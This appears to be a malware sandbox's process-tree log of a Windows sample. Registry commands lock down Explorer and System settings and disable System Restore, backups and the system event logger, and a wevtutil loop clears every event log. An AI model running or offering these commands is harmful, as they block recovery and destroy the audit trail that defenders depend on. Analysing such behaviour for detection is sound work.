  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1664
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:1492
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe el
      4⤵
      PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        5⤵
        
        PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1912
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1412
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    3⤵
    PID:1596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:1924
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:1248
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:1012
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:1432
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    3⤵
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:1736
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:932
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    3⤵
    PID:1880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:1124
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:1472
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:936
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:220
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:212
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:908
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:236
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1760
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:280
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:848
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1692
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1940
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    PID:1508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    - Clears Windows event logs
    PID:1924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    PID:772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    PID:804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:1360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    - Clears Windows event logs
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    - Clears Windows event logs
    PID:864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    - Clears Windows event logs
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:1692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    - Clears Windows event logs
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:1104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:1680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:1912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    - Clears Windows event logs
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    - Enumerates connected drives
    PID:1412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:1148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:1012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:2036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    - Enumerates connected drives
    PID:1936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    - Clears Windows event logs
    PID:916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:1896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    - Clears Windows event logs
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:2016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:1888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:1556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:1460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:1940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:1052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    - Clears Windows event logs
    PID:1508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    - Clears Windows event logs
    PID:1440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    - Clears Windows event logs
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:1924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:1360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:1452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    - Clears Windows event logs
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    - Clears Windows event logs
    PID:436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    - Clears Windows event logs
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    - Clears Windows event logs
    PID:1492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    - Clears Windows event logs
    PID:1652
- - C:\Windows\system32\wevtutil.exe
